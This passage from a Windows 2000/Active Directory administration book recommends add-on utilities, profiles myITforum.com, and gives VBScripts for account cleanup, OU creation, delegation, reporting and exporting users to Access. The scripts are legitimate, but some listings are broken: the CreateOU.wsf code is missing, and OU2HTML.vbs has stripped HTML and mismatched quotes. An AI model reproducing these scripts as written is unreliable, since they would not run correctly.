+and less. One major complaint about NT was its lack of disk
+quotas, something Unix has included since day one. A number of
+companies noticed this oversight and produced a product that
+did the trick. The release of Windows 2000 saw disk quotas
+become part of the OS, thus making the need to purchase this
+type of software an irrelevance for the majority of companies.
+Whether you agree with Microsoft's policy of continually adding
+features to its products that were once available only from other
+sources is one for debate. But in my role as a network
+administrator, I still find a need to seek out additional software
+to help make my job a lot easier. I'm sure everyone has their
+favorite must-have utilities, but these are my top five must-have
+add-on products for Windows 2000.
+Server Monitor Lite
+Server Monitor Lite is an invaluable monitoring product that
+allows you to monitor your servers centrally and get notified if a
+problem occurs. I use this utility to ping all my servers
+
+periodically, watch for low disk space, keep an eye on critical
+services, and make sure the company intranet is still accessible
+for my users. For more information, see
+http://www.purenetworking.net/Products/ServerMonitor/ServerMonitor.htm
+Lost Password Recovery
+Have you inherited systems for which nobody knows the local
+administrator password, or do you have users that need access
+to Word, Excel, or Access documents that are password-
+protected and nobody knows the password? Well, this handy
+little product will save the day. It lets you reset the password on
+a huge array of systems. For more information, see
+http://www.lostpassword.com.
+Data Replicator
+Do you need to copy files from one system to another on a
+regular basis? Data Replicator makes this job much easierit
+allows you to watch files or folders for changes, and then
+replicate them to another location. You can copy files across a
+LAN, WAN, or via FTP, which makes Data Replicator a great
+alternative to traditional backup software. For more information,
+see
+http://www.purenetworking.net/Products/DataReplicator/DataReplicator.htm
+Virtual Network Computing (VNC)
+Take control of your remote servers from the comfort of your
+
+desk. VNC lets you control Windows, Unix, and Mac machines.
+For more information, see http://www.realvnc.com.
+Network View
+With this handy tool, you'll never need to draw out your network.
+It automatically generates a network diagram for you within
+minutes. For more information, see http://www.networkview.com.
+Janet Ryding
+
+Hack 16 myITforum.com
+One of the best resources around for administrators who deploy
+and manage Windows-based networks, myITforum.com is best
+described by its CEO and founder, Rod Trent.
+myITforum.com (http://www.myitforum.com) is the leading
+systems administration web site and community. It was created
+to be the Internet's premiere knowledge and information forum
+for IT professionals. The web site provides IT administrators the
+opportunity to gain better insight about what they do by
+learning/sharing from other IT experts throughout the world.
+Through the web site, myITforum.com users give tips, share
+insight, and download utilities and tools to assist them in
+managing their IT enterprises. Whether you oversee 10 nodes or
+100,000 nodes, myITforum.com can help you manage your
+environment.
+myITforum.com is managed by Rod Trent (myself!), a Microsoft
+MVP and author of the best-selling books Microsoft SMS
+Installer, Admin911: SMS, and IIS 5.0: A Beginner's Guide. Rod
+Trent is the leading authority on Microsoft SMS and an annual
+presenter and keynote presenter at the annual Microsoft
+Management Summit
+(http://www.microsoft.com/management/training/mms.mspx). He
+has over 18 years of IT experience, 8 of which have been
+dedicated to SMS. In addition to his best-selling books, Rod has
+written thousands of articles on technology topics in many
+publications, on the Web, and in the form of Microsoft white
+
+papers, case studies, and technical guides. Rod is also a
+principal in NetImpress, Inc. (http://www.netimpress.com), a
+technology publishing company.
+History
+myITforum.com's roots lead back to the now defunct Swynk.com
+web site. Swynk.com was founded and operated by Stephen
+Wynkoop until 1999. Stephen had developed a web site that
+allowed administrators all over the world to gain support for their
+everyday IT tasks. myITforum.com was built on the success of
+the Systems Management Server (SMS) section of Swynk.com.
+The success of the SMS section led to an urgency to keep the
+ever-growing community alive when it was evident that the
+parent company of Swynk.com was not going to support it.
+Swynk.com had become much more than simply content and
+articles, and it became evident that the web site had outgrown
+its electronic boundaries. It had become a live community that
+was represented both on the Web and in the real IT world. So, the
+SMS community from Swynk.com migrated to its web site
+location: http://www.myitforum.com.
+Since the move, myITforum.com has grown by leaps and bounds,
+primarily due to the opportunities it presents to administrators
+all over the world to interact with their fellow administrators and
+peers. The members of the myITforum.com community are the
+most caring folks found in any corner of the Internet. They give
+their time, experience, and knowledge selflessly to help create a
+brain trust of smarter administrators who become efficient and
+proficient IT professionals.
+Scope
+
+While myITforum.com was based on Microsoft Systems
+Management Server, it has grown far beyond this one topic. To be
+an SMS administrator, an IT professional must be proficient in
+far more than just SMS. SMS administrators are required to
+support many different applications, operating systems, and
+technologies. Because of this requirement and myITforum.com's
+ability to grow quickly with the community needs,
+myITforum.com expanded its topic base to include many more
+areas in the IT world. myITforum.com supports Altiris products,
+Microsoft Operations Manager (MOM), VBScript, SMS
+1.2/2.0/2003, Windows, SQL Server, Networking, Active
+Directory, security and patch management, antivirus
+technologies, Windows Mobile technologies, web technologies,
+and deployment technologies such as Windows Installer.
+MyITforum.com supports these many topics through articles,
+email discussion lists, and web-based forums Figure 1-18
+shows the myITforum.com home page. The articles posted to
+the web site are quite a bit different than the articles you find in
+other publications. Instead of information from individuals you
+can't be sure have ever worked in IT, the myITforum.com
+articles are from real IT workers from real IT experiences. The
+premise is that if you are faced with a real-world situation,
+someone out there has probably already been through it and has
+the solution all wrapped up. By sharing their experiences through
+articles, the myITforum.com columnists provide a central
+location for IT administrators all of the world to get solutions to
+problems they might be facing, without having to spend days or
+weeks working through a tough situation. If it's a problem,
+someone has already faced it and succeeded, and the solution is
+probably outlined on myITforum.com.
+Figure 1-18. Home page of myITforum.com
+
+In addition to providing these web resources for the
+myITforum.com community, myITforum.com has transcended
+the confines of the Internet. Because real IT professionals make
+up the myITforum.com community, myITforum.com has reached
+beyond the Web to aid real people in setting up real-world local
+communities. myITforum.com has been instrumental in setting
+up over 17 user groups all over the world. From the U.S. to
+Canada to Israel to Australia, myITforum.com has provided
+valuable time and resources to set up and manage some of the
+
+most successful user group communities in the real world.
+myITforum.com provides many things to the user groups,
+including a free web site for the group's web presence, contacts
+with vendors for speaking services, and an intermediary link
+between Microsoft and the user group for planning, support, and
+meeting facilities.
+Over time, myITforum.com has also become a successful
+liaison between employers and prospective employees. Offered
+as a free service, myITforum.com has helped place hundreds of
+qualified employees into IT jobs. During the last few years, when
+the economy has caused layoffs and outsourcing,
+myITforum.com has stood as a central beacon for employers
+and employees to connect with each other. So, in addition to
+providing a central repository for connecting with peers,
+myITforum.com has become an informal meeting place, where
+workers find employment and employers locate the top
+candidates for open positions.
+It has been noted that if you attend any IT event, anywhere in
+the world, you will find at least one myITforum.com community
+member. myITforum.com's influence reaches into almost every
+nook of the IT world, primarily because it provides what IT
+professionals need to advance to a higher level in their
+profession, but also because it provides a level of sharing that
+can't be experienced anywhere else. myITforum.com is a real
+community comprised of real people with real personalities.
+Participating in myITforum.com is like meeting with friends.
+myITforum.com is an ever-evolving, ever-growing community
+meeting place that extends experience and knowledge that is
+more valuable than sitting through a weeklong training class. At
+the end of the day, myITforum.com is the one location for
+everything IT.
+Rod Trent
+
+Chapter 2. Active Directory
+Hacks #17-24
+Section 17. Retrieve the List of Old Domain Computer
+Accounts
+Section 18. Automate Creation of OU Structure
+Section 19. Modify All Objects in the OU
+Section 20. Delegate Control of an OU to a User
+Section 21. Send OU Information in Active Directory to
+an HTML Page
+Section 22. Display Active Directory Information
+Section 23. Store and Display Contact Information in
+Active Directory
+Section 24. Restore the Active Directory Icon in
+Windows XP
+
+Hacks #17-24
+Most of the time you're administering Active Directory, you're
+probably using the Active Directory Users and Computers
+console. Like most GUI tools, this console is easy to use but ill-
+suited for complex or repetitive tasks. That's where scripts
+come in, and this chapter includes a handful of VB scripts that
+leverage the Active Directory Services Interface (ADSI) and
+Windows Management Instrumentation (WMI) to make your life
+simple. These scripts can be used to perform tasks such as
+searching for old computer accounts, creating organizational
+units (OUs), delegating authority over OUs, and displaying
+information about objects stored in Active Directory. See
+Chapter 3 for additional scripts targeted mainly to administering
+users and groups with Active Directory.
+As with any custom scripts, be sure to try them in a test
+environment before using them on your production network. Also
+make sure that you have the latest scripting engines on the
+workstation or server from which you run these scripts. You can
+download the latest scripting engines from the Microsoft
+Scripting Home Page (http://msdn.microsoft.com/scripting/).
+Finally, note that when you work with ADSI you must have the
+same applicable rights you use for running the built-in
+administrative tools. Typically, what this means is that you need
+to be a member of either the Administrators group on the
+machine being targeted or the Domain Admins group in an
+Active Directory environment.
+
+Hack 17 Retrieve the List of Old Domain
+Computer Accounts
+Finding inactive computer accounts in Active Directory is a
+choreunless, of course, you script it.
+If you need to quickly retrieve a list of old (inactive) computer
+accounts in the domain, VBScript is your utility of choice. The
+script in this hack first asks for the domain name (Figure 2-1),
+then prompts for the number of days for active computer
+accounts (Figure 2-2), and then, finally, displays the old
+computer accounts that are found in the domain.
+Figure 2-1. Specifying the name of your domain
+
+Figure 2-2. Specifying number of days for cutoff
+The computer accounts shown have not been active during the
+days you specified. For example, when we run the script we can
+see that the computer account for the machine named SRV111
+has a password whose age is beyond the cutoff, so the script
+recommends that you delete this account to be safe (Figure 2-
+3).
+Figure 2-3. Recommending an account that
+should be deleted
+This is a great, quick way to find those computers that could be
+having trouble authenticating, or those that have been brought
+
+down but remain in the domain's list.
+The Code
+Type the following code into Notepad (make sure Word Wrap is
+turned off), and save it with a .vbs extension as
+DeleteOldComputers.vbs:
+On Error Resume Next
+DomainString=Inputbox("Enter the domain name","Check Active Computers","DomainName")
+if DomainString="" then
+wscript.echo "No domain specified or script cancelled."
+wscript.quit
+end if
+numDays=InputBox("What is the number of days to use as a cutoff for" & _
+"Active Computer Accounts?","Check Active Computers","XX")
+if numDays="" then
+
+wscript.echo "No cutoff date specified or script cancelled."
+wscript.quit
+end if
+Set DomainObj = GetObject("WinNT://"&DomainString)
+if err.number<>0 then
+wscript.echo "Error connecting to " & DomainString
+wscript.quit
+end if
+DomainObj.Filter = Array("computer")
+Wscript.echo "Computer Accounts in " & DomainString & " older than " & _ numDays & " days."
+For each Computer in DomainObj
+Set Account = GetObject("WinNT://" & DomainString & "/" & Computer.Name & _ "$")
+RefreshTime = FormatNumber((Account.get("PasswordAge"))/86400,0)
+If CInt(RefreshTime) >= CInt(numDays) Then
+
+wscript.echo "**DELETE** " & Computer.Name & " Password Age is " & _ RefreshTime & " days."
+End If
+Next
+set DomainObj=Nothing
+set Shell=Nothing
+Wscript.quit
+Running the Hack
+To run this script, use Cscript.exe, the command-line script
+engine for the Windows Script Host (WSH). Here's some sample
+output when the script is run to delete computer accounts older
+than 90 days in the MTIT domain:
+C:\>cscript.exe DeleteOldComputers.vbs
+Microsoft (R) Windows Script Host Version 5.6
+Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
+Computer Accounts in mtit older than 90 days.
+**DELETE** NEWTEST1 Password Age is 151 days.
+
+**DELETE** QWER Password Age is 151 days.
+**DELETE** SRV211 Password Age is 97 days.
+**DELETE** SRV212 Password Age is 154 days.
+Rod Trent
+
+Hack 18 Automate Creation of OU
+Structure
+Here's a snappy method for creating a standard hierarchy of
+organizational units (OUs) for a domain.
+If you manage deployment of Active Directory in a medium-
+sized or large organization, you probably are spending a
+significant amount of time trying to maintain consistency in the
+Active Directory hierarchy. Even within a single domain, it
+typically makes sense to keep your organizational units (OUs)
+structured according to some agreed-upon rules. Regardless of
+whether your top-tier OU design is based on functional,
+business, geographic, or some other criteria, you will likely
+benefit from keeping the lower tiers arranged in the same
+fashion. This way, for example, you can formulate standard
+operating procedures that will apply across the entire
+organization. You can also attempt to automate some of the
+common administrative tasks, such as user, group, or computer
+account creation; script delegations and permission
+assignments; and group policy object management on the OU
+level.
+One of the ways to make sure that the structure will remain
+consistent throughout Active Directory deployment is to script
+the OU-creation process. The script in this hack creates a
+sample OU hierarchy. The assumption is that the top-level OUs
+are created manually, while the lower layers are always the
+same. The structure follows Microsoft best practices and
+
+includes two second-tier OUs: Accounts and Resources. The
+Accounts OU is further divided into Users, ServiceAccounts, Groups,
+and Admins. Resources consists of Workstations and Servers. It is
+fairly easy to extend this structure (for example, you could
+create separate OUs for different server types, such as File,
+Print, or TerminalServices, beneath the Servers OU). The script
+performs some error checking to verify that the respective
+organizational units haven't been created yet.
+The Code
+The following VBScript is a Windows script (*.wsf) file, a text
+document that contains Extensible Markup Language (XML)
+code. Using a text editor such as Notepad (with Word Wrap
+turned off) type the following code and save it as CreateOU.wsf:
+
+
+
+
+
+Running the Hack
+To execute the script, open a command prompt, change to the
+directory in which CreateOUs.wsf resides, and type cscript.exe
+//nologo CreateOUs.wsf "OUName", where OUName is the name of the
+top-level OU. If OUName does not already exist, you'll get an error.
+To illustrate how this script works, I first created an OU named
+Boston in the mtit.com domain and then ran cscript.exe //nologo
+CreateOUs.wsf "Boston" from the command line. Figure 2-4 shows
+the result in Active Directory Users and Computers.
+Figure 2-4. OU hierarchy for Boston
+
+Marcin Policht
+
+Hack 19 Modify All Objects in the OU
+Use this script to quickly change specific properties of all
+objects within an organizational unit.
+Using GUI tools such as Active Directory Users and Computers
+to modify the properties of objects stored in Active Directory is
+a slow process. In Windows 2000, you have to open the
+properties sheet for each object, switch to the appropriate tab,
+and make the change; then, you must do it over and over again
+for other objects. In Windows Server 2003, you can open the
+properties of multiple objects simultaneously, but not all tabs
+are available when you do this and only a small number of
+settings can be modified in this way. It would be nice if there
+were a faster way of doing this. Using VBScript, this is indeed
+possible.
+The sample script in this hack shows how you can modify the
+properties of all objects in a specific OU. This particular script
+modifies the state, address, postal code, and city for all User
+objects in the Boston OU in the mtit.com domain, but it can easily
+be customized to modify other properties of objects. This script
+is particularly useful if you've planned your implementation of
+Active Directory so that users in the same OU have certain sets
+of similar properties, such as their business address
+information.
+The Code
+
+Type the following script into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension as ModifyUsers.vbs. Be sure to
+customize the second line to specify the OU and domain for your
+own environment, and customize the Put statements to use the
+address information appropriate for users in your OU.
+Dim oContainer
+Set oContainer=GetObject("LDAP://OU=Boston,DC=mtit,DC=com")
+ModifyUsers oContainer
+'cleanup
+Set oContainer = Nothing
+WScript.Echo "Finished"
+Sub ModifyUsers(oObject)
+Dim oUser
+oObject.Filter = Array("user")
+For Each oUser in oObject
+
+oUser.Put "st","Your State"
+oUser.Put "streetAddress","Your Address"
+oUser.Put "postalCode","Your Zip"
+oUser.Put "l","Your City"
+oUser.SetInfo
+Next
+End Sub
+Running the Hack
+To run the script, simply create a shortcut to it and double-click
+on the shortcut. A dialog box will appear, indicating that the
+script ran successfully. Figure 2-5 shows what the Address tab
+of the properties sheet for user Bob Smith (who is in the Boston
+OU) looks like after running the script.
+Figure 2-5. Result of running the
+ModifyUsers.vbs script
+
+Rod Trent
+
+Hack 20 Delegate Control of an OU to a
+User
+Rather than use the Delegation of Control Wizard, use this
+script to delegate authority over an organizational unit (OU) to
+a particular user.
+By delegating administrative responsibilities, you can eliminate
+the need for multiple administrative accounts that have broad
+authority (such as over an entire domain). Although you likely
+will still use the predefined Domain Admins group for
+administration of the entire domain, you can limit the accounts
+that are members of the Domain Admins group to highly trusted
+administrative users.
+Administrative control can be granted to a user or group by
+using the Delegation of Control wizard. The Delegation of Control
+wizard allows you to select the user or group to which you want
+to delegate control, the organizational units and objects you
+want to grant those users the right to control, and the
+permissions to access and modify objects.
+The Code
+While using the wizard to do this is straightforward, there is a
+quick and easy way to achieve the same effect through
+
+VBScript. Just open a text editor such as Notepad (making sure
+that Word Wrap is disabled), type the following script, and save it
+with a .vbs extension as DelegateOU.vbs:
+Set ou = GetObject("LDAP://OU=Test,OU=Users,OU=Services,OU=Network,DC=MY,DC=Domain,
+DC=com")
+Set sec = ou.Get("ntSecurityDescriptor")
+Set acl = sec.DiscretionaryAcl
+Set ace = CreateObject("AccessControlEntry")
+ace.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT
+ace.AccessMask = ADS_RIGHT_DS_CREATE_CHILD Or ADS_RIGHT_DS_DELETE_CHILD
+ace.ObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
+'User's GUID (schemaIDGuid)
+ace.AceFlags = ADS_ACEFLAG_INHERIT_ACE
+ace.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT
+ace.Trustee = "MY\Jsmith" 'User to delegate to
+acl.AddAce ace
+sec.DiscretionaryAcl = acl
+ou.Put "ntSecurityDescriptor", Array(sec)
+ou.SetInfo
+
+Set ace = Nothing
+Set acl = Nothing
+Set sec = Nothing
+When you run this script, the result is to delegate to the user the
+ability to create and delete users in the
+MY.DOMAIN.COM/NETWORK/SERVICES/USERS/TEST organizational unit.
+The first line you need to customize to make this work in your
+own environment is this one:
+Set ou = GetObject("LDAP://OU=Test,OU=Users,OU=Services,OU=Network," & _
+DC=MY,DC=Domain,DC=com")
+You must insert the distinguished name (DN) of the OU to which
+you want to delegate this right in the LDAP URL section of the
+command line. For example, if you want the delegated user to be
+able to add and delete users in the OU called
+UR.DOMAINHERE.COM/HR/USERS, the line would need to look like this:
+Set ou = GetObject("LDAP:// OU=Users,OU=HR,DC=Ur,DC=Domainhere,DC=com")
+Here is another line you need to modify for your environment:
+ace.Trustee = "MY\Jsmith" User to delegate to
+In the section in double quotes ("MY\Jsmith"), you must insert
+the username for the user to whom you want to delegate the right
+to add and delete users. For example, if the user that you want to
+be able to ADD and DELETE users is called Janedoe, the line would
+look like this:
+ace.Trustee = "UR\Janedoe" 'Who is the beneficiary of this ace
+
+Make sure you have the latest scripting engines on the
+workstation you run this script from; you can download current
+scripting engines from the Microsoft Scripting home page
+(http://msdn.microsoft.com/library/default.asp?
+url=/nhp/Default.asp?contentid=28001169). When working with
+the Active Directory Services Interface (ADSI), you must have
+the same applicable rights you need to use the built-in
+administrative tools.
+Running the Hack
+To run the script, simply create a shortcut to the script and
+double-click on the shortcut. The script itself does the rest.
+Hans Schefske
+
+Hack 21 Send OU Information in Active
+Directory to an HTML Page
+Here's a terrific way to quickly display all the organizational
+units (OUs) in a domain.
+If your Active Directory (AD) domains have a lot of OUs in
+them, it's easy to lose track of them, especially if you have OUs
+nested within OUs. This handy script generates an HTML page
+of all OUs in your current AD domain showing their path,
+description, and creation date. This information not only tells
+you which OUs you have in your domain, it also tells you which
+OUs contain other OUs, so you can easily create a map of the
+OU structure of your domain.
+The Code
+Just open Notepad or some other text editor (with Word Wrap
+disabled), type the following script, and save it with a .vbs
+extension as OU2HTML.vbs:
+On Error Resume Next
+Dim Root,Domain,wshNetwork
+
+Dim oFileSys,fh
+Set Root = GetObject("LDAP://RootDSE")
+DomainPath = Root.Get("DefaultNamingContext")
+Set Domain = GetObject("LDAP://" & DomainPath)
+set wshNetwork=CreateObject("Wscript.Network")
+myDomain=wshNetwork.UserDomain
+htmlfile=myDomain & "-OUs.htm"
+Set oFileSys=CreateObject("Scripting.FileSystemObject")
+Set fh=oFileSys.CreateTextFile(htmlfile)
+fh.WriteLine "" & myDomain & " Organizational Units "
+fh.WriteLine "" & myDomain & " & _
+"Organizational Units "
+
+fh.WriteLine ""
+fh.WriteLine " " & _
+"OU
"
+fh.WriteLine "Description
"
+fh.WriteLine " " & _
+"Path
"
+fh.WriteLine " " & _
+"Created
"
+wscript.echo "Getting OU information for " & mydomain & "..." & _
+EnumOU Domain.ADSPath
+fh.WriteLine "
Page Generated " & Now & " _
+" "
+fh.WriteLine ""
+fh.close
+wscript.echo "Output has been sent to " & htmlfile
+
+Set oFileSys=Nothing
+Set fh=Nothing
+Set domain=Nothing
+Set Root=Nothing
+Set wshNetwork=Nothing
+wscript.quit
+'*****************************************
+Sub EnumOU(objPath)
+'On Error Resume Next
+Set objPath = GetObject(objPath)
+objPath.Filter=Array("organizationalUnit")
+
+For Each item in objPath
+If item.Description="" Then
+ouDescription="N/A"
+Else
+ouDescription=item.Description
+End If
+fh.writeLine "" & MID(item.Name,4) & " " & ouDescription & _
+" " & item.ADSPath & " " & GetCreated(item.ADSPath) & " "
+'Uncomment next line for debugging purposes
+' wscript.echo item.Name & vbTab & item.Description & vbTab & item.ADSPath
+'Iterate through
+EnumOU item.ADSPath
+Next
+
+Set objPath=Nothing
+End Sub
+'****************************
+Function GetCreated(objPath)
+On Error Resume Next
+Set objDetail=GetObject(objPath)
+Set objSchema=GetObject(objDetail.Schema)
+For Each z in objSchema.OptionalProperties
+Set adsProperty = GetObject("LDAP://Schema/" & z)
+If z="whenCreated" Then
+strCreated = objDetail.Get(z)
+GetCreated=strCreated
+'wscript.echo "Created " & strCreated
+
+strValue=""
+End If
+Next
+End Function
+Running the Hack
+To run the script, simply create a shortcut to the script, double-
+click on the shortcut, and follow the prompts provided by the
+dialog boxes the script generates. When the script runs, it
+creates an HTML page in the same directory in which the script
+itself is located. The name of this HTML page is domain-OUs.htm,
+where domain is the name of your domain. Figure 2-6 shows a
+sample HTML page created for a test domain named mtit.com.
+Figure 2-6. OUs in the mtit.com domain
+
+It's easy to see from the Path column in Figure 2-6 that the
+Local and National OUs are contained within the Sales OU.
+Hans Schefske
+
+Hack 22 Display Active Directory
+Information
+Here are five sample scripts that can be used to display
+information about computers, domains, sites, and trusts in
+Active Directory.
+Scripts are a quick way to drill down into Active Directory to
+display information you'd otherwise have to hunt for using the
+GUI. These five sample scripts can be used by themselves or as
+starting points for developing more sophisticated scripts. Just
+type them into Notepad (with Word Wrap turned off) and save
+them with a .vbs extension. Then, type cscript.exe scriptname.vbs
+to run them from a command prompt. Enjoy!
+List All Computers in the Domain
+The following VBScript retrieves a list of all computers in a given
+domain (or Active Directory container). Modify the Domain to your
+company's NT/2000 domain name or Active Directory container,
+and the list of registered computers will display:
+Dim Container
+Dim ContainerName
+
+Dim Computer
+ContainerName = "Domain"
+Set Container = GetObject("WinNT://" & ContainerName)
+Container.Filter = Array("Computer")
+For Each Computer in Container
+Response.Write Computer.Name & " "
+Next
+Get a List of All Domains
+This VBScript enumerates and lists all domains:
+Dim NameSpace
+Dim Domain
+Set NameSpace = GetObject("WinNT:")
+For Each Domain in NameSpace
+Response.Write Domain.Name & " "
+Next
+Get AD Site
+
+This VBScript retrieves the name of the site to which the
+computer is assigned:
+Set WshShell = Wscript.CreateObject("Wscript.Shell")
+On Error Resume Next
+Site = "Not Assigned"
+Site = WshShell.RegRead( "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\" & _
+"Services\Netlogon\Parameters\SiteName" )
+If Err.Number=-2147024894 Then
+Site = WshShell.RegRead( "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\" & _
+"Services\Netlogon\Parameters\DynamicSiteName" )
+End If
+If Site = "Not Assigned" Then
+WScript.Echo "This computer is not assigned to an Active Directory site."
+Else
+WScript.Echo "This computer is assigned to Active Directory site: " & site
+End If
+Find a DC in a Site
+
+Use this VBScript to verify that a specific domain controller
+(DC) exists in a site. Just replace the items in double quotes in
+the first two lines with your values:
+strDcName = "DCName"
+strSiteName = "SiteName"
+Set objADSysInfo = CreateObject("ADSystemInfo")
+strDcSiteName = objADSysInfo.GetDCSiteName(strDcName)
+If UCase(strSiteName) = UCase(strDcSiteName) Then
+WScript.Echo "TRUE: " & strDcName & " is in site " & strSiteName
+Else
+WScript.Echo "FALSE: " & strDcName & " is NOT in site " & strSiteName
+End If
+List Trust Relationships
+Use this script to enumerate the trust relationships for your
+domain and display the results:
+strComputer = "."
+Set objWMIService = GetObject("winmgmts:" _
+
+& "{impersonationLevel=impersonate}!\\" & _
+strComputer & "\root\MicrosoftActiveDirectory")
+Set colTrustList = objWMIService.ExecQuery _
+("Select * from Microsoft_DomainTrustStatus")
+For each objTrust in colTrustList
+Wscript.Echo objTrust.TrustedDomain
+Wscript.Echo objTrust.TrustDirection
+Wscript.Echo objTrust.TrustType
+Wscript.Echo objTrust.TrustAttributes
+Wscript.Echo objTrust.TrustedDCName
+Wscript.Echo objTrust.TrustStatus
+Wscript.Echo objTrust.TrustIsOK
+Next
+Rod Trent
+
+Hack 23 Store and Display Contact
+Information in Active Directory
+Using a script and an Access database, you can store detailed
+contact information in Active Directory and display it as an
+HTML page.
+Would you like to store all your employee contact information in
+Active Directory and then be able to display that information on
+an intranet page? Where I work, there are a number of
+individuals maintaining lists of user information. The telecom
+person maintains an Excel spreadsheet of employee names,
+phone numbers, and office locations. The Web person maintains
+a similar list for the Internet page. There's another list of sorts
+in a public folder on our Exchange server. I thought there must
+be a better way to get this information out that doesn't require
+quite so many people doing similar tasks.
+Figure 2-7 shows my solution to this challenge.
+Figure 2-7. HTML interface for Access database
+
+I created an Access database named EmployeeInfo.mdb, with
+fields for the information I'd like to make available. I then
+created a .vbs script named ExportAdUsers.vbs, which processes
+Active Directory user accounts that meet a specified criterion
+and exports the account information to the database. The
+information in the database is accessible via the Data Access
+Page shown in Figure 2-7.
+While developing this solution, I found that I needed to be able
+to list information for employees who might not have an Active
+Directory user account. The database is open, so a designated
+person can maintain information for such employees.
+Each time Active Directory account information is updated, the
+script should be run again to update the Access database. I
+added a field to the database that contains a value that
+differentiates records that were manually entered from records
+that were created by running the script. To be sure that no
+duplicates exist in the database, prior to performing each export,
+the script deletes all records that are indicated as being
+exported from Active Directory.
+The Code
+Type the following VBScript into Notepad (with Word Wrap turned
+off) and save it with a .vbs extension as ExportAdUsers.vbs:
+Option Explicit
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+' File: ExportADUsers.vbs
+' Updated: Dec 2003
+' Version: 1.0
+' Author: Dan Thomson, myITforum.com columnist
+' I can be contacted at dethomson@hotmail.com
+'
+' Usage: This script should be run using cscript.
+' cscript ExportADUsers.vbs
+'
+' Input: None
+'
+' Notes: This script exports all users whose accounts are not disabled,
+' not expired, or do not have NoExport in their Notes section.
+' There is also a constant "Users2Skip" to which you should add
+' any names which should not be exported.
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+On Error Resume Next
+' The name of the Access database to use
+Const AccessDatabase = "EmployeeInfo.mdb"
+' The name of the Access table to use
+Const AccessTable = "tblEmployeeInfo"
+' List of users who should NOT be exported
+' This list should contain the user's logon name
+' Separate each name by a comma
+Const Users2Skip = "Guest"
+' Constant for the account being disabled
+Const ADS_UF_ACCOUNTDISABLE = 2
+' Constant for the search to search subtrees
+Const ADS_SCOPE_SUBTREE = 2
+
+Const adOpenStatic = 3
+Const adLockOptimistic = 3
+' General variable declarations
+Dim objConnectionDB, objRecordsetDB
+Dim objConnectionAD, objCommandAD, objRecordsetAD
+Dim dtStart
+Dim strSQL
+Dim objRootDSE, strDNSDomain
+Dim strDN, intUAC, strSam, strDisplayName, strManagerDN, dtExpireDate
+Dim blnProcessUser
+Dim objUser, objManager
+' Get the start time of the script
+dtStart = TimeValue(Now( ))
+'Create and open ADO connection to the Access database
+Set objConnectionDB = CreateObject("ADODB.Connection")
+
+Set objRecordsetDB = CreateObject("ADODB.Recordset")
+' Open the database
+objConnectionDB.Open "Provider=Microsoft.Jet.OLEDB.4.0;" & _
+"Data Source=" & AccessDatabase & ";"
+' Open the recordset
+objRecordsetDB.Open AccessTable, objConnectionDB, adOpenStatic, adLockOptimistic
+' Define the SQL statement used to clear out previous
+' user info which was exported from AD
+strSQL = "DELETE FROM " & AccessTable & " WHERE ImportedFromAD = 'True'"
+Wscript.Echo "Removing previously exported records from the " & _
+AccessDatabase & " database."
+objConnectionDB.Execute strSQL, , 129
+
+' Determine the DNS domain from the RootDSE object.
+Set objRootDSE = GetObject("LDAP://RootDSE")
+strDNSDomain = objRootDSE.Get("defaultNamingContext")
+' Create and open an ADO connection to AD
+Set objConnectionAD = CreateObject("ADODB.Connection")
+Set objCommandAD = CreateObject("ADODB.Command")
+objConnectionAD.Provider = "ADsDSOObject"
+objConnectionAD.Open "Active Directory Provider"
+' Set connection properties
+With objCommandAD
+.ActiveConnection = objConnectionAD
+' Use SQL syntax for the query
+' This retrieves all values named in the SELECT section for
+' user accounts which do not have the Notes section = NoExport.
+
+' The recordset is sorted ascending on the displayName value.
+.CommandText = _
+"Select userAccountControl, distinguishedName," & _
+" sAMAccountname, displayName" & _
+" FROM 'LDAP://" & strDNSDomain & "'" & _
+" WHERE objectCategory = 'person' AND" & _
+" objectClass = 'user' AND info <> 'NoExport'" & _
+" ORDER BY displayName"
+.Properties("Page Size") = 1000
+.Properties("Timeout") = 30
+.Properties("Searchscope") = ADS_SCOPE_SUBTREE
+.Properties("Cache Results") = False
+End With
+Wscript.Echo "Running the query to find users."
+Set objRecordSetAD = objCommandAD.Execute
+
+' Move to the first record in the recordset
+objRecordSetAD.MoveFirst
+' Loop until we reach the end of the recordset
+Do While NOT objRecordsetAD.EOF
+' Blank out/reset a few variables..just in case.
+strDN = ""
+intUAC = ""
+strSam = ""
+strDisplayName = ""
+strManagerDN = ""
+dtExpireDate = ""
+blnProcessUser = True
+' Get the userAccountControl value. This lets us, among other things,
+' determine if the account is disabled.
+intUAC = objRecordsetAD.Fields("userAccountControl")
+
+' Process user if account is not disabled.
+If (NOT intUAC AND ADS_UF_ACCOUNTDISABLE) Then
+' Get the user's logon name
+strSam = objRecordsetAD.Fields("sAMAccountname")
+' Determine if the user is included in the list of logon names to skip.
+If Instr(UCase(Users2Skip), UCase(strSam)) Then blnProcessUser = False
+' Get the user's display name
+strDisplayName = objRecordsetAD.Fields("displayName")
+' Set boolean value to skip this user if the user's display name is
+' blank.
+If strDisplayName = "" Then blnProcessUser = False
+
+' If our simple checks went ok, we can now process this user.
+If blnProcessUser = True Then
+' Get the distinguished name of this user
+' The syntax is something like:
+' CN=Joe E. Law,OU=Sales,OU=US,DC=mydomain,DC=local
+strDN = objRecordsetAD.Fields("distinguishedName")
+' Bind to the user object
+Set objUser = GetObject("LDAP://" & strDN & "")
+' Process the user
+With objUser
+Wscript.Echo "Processing user: " & strDisplayName
+' Get the user's account expiration date
+dtExpireDate = CDate(.AccountExpirationDate)
+
+' Process the user if the user's account expiration date is not
+passed
+If (dtExpireDate = "") OR _
+(dtExpireDate = CDate("01/01/1970")) OR _
+(dtExpireDate >= Date( )) Then
+'Add new record to the Access database
+objRecordsetDB.AddNew
+' Get user data from AD and populate the new record in the
+' Access database
+' You can use the .Get("xxx") or .xxx formats to retrieve the data
+' All fields on the left MUST exist in the Access table
+objRecordsetDB("FirstName") = .Get("givenName")
+objRecordsetDB("MiddleName") = .initials
+objRecordsetDB("LastName") = .sn
